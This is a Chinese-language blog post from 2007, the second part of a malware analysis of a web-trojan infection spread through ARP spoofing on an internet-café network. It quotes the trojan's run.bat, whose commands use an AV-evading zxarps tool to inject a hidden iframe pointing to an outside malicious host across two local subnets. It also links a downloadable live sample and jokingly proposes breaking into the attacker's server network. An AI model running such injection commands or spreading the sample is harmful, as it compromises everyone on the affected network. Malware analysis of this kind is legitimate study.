yymp3.com挂马逆向分析[下]
Submitted by 黯魂 on 2007, November 24, 1:57 PM. 学习笔记
网马分析完了,再来验证一下攻击者的挂马方式吧!
打开浏览器,随便输入一个网站,我这里进入的是安全代码,结果如下图所示:
那毫无疑问,又一个ARP挂马的侵蚀者。
最后,来看看木马程序对我们的系统所做的改动以及生成的文件。
这是Windows目录下同一修改时间的文件截图:
这是system32目录下生成的几个文件,尤其需要注意vml.exe以及run.bat
run.bat的内容如下:
Vml.exe -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src='http://xx.exiao01.com/2.htm' width=20 height=1></iframe>"
Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert "<iframe src='http://xx.exiao01.com/2.htm' width=20 height=1></iframe>"
Exit
接着在命令行模式下运行vml.exe并以问号为参数敲击回车键后,终于明白了攻击者所做的一切。
而且在帮助末尾处有这样一行话:zxarps 免杀版 http://prcer.com/,怀着好奇的心打开了这个网站,原来又是一位“牛人”……
最后,很遗憾,在重新启动机器后发现该木马,准确的说应该是rootkit程序真牛,通过那个sys文件把自身以ring0级加载,很轻松地就击败了还原软件DeepFreeze V6,而我前面下载的东西却正常消失
……
网吧这台机器又遭殃了,整个网吧都遭殃了,哎,下次需要换网吧……
这次分析到此就告一段路了,感兴趣的朋友可以把附件中的下载者样本down回去研究,至于其他都没有什么技术含量可言。
综述:通过这次简单的分析可以看出攻击者极有可能是一个只会用工具的script kids,但由于我的环境有限,无法进一步追踪,其实还可以对yymp3.com服务器所在网段来个检测,运气好的话渗透进其中一台,对攻击者来个钓鱼 :)
附录:
1. yymp3.com站点相关信息:
2. 下载者样本一只(由于攻击者所用网马似乎全是刺客网马生成工具的杰作,也就没什么研究价值):
http://www.anhun.cn//attachment.php?id=25
此时已能被最新病毒库的卡巴检测,免杀失效 ^_^
TAG:
评分(
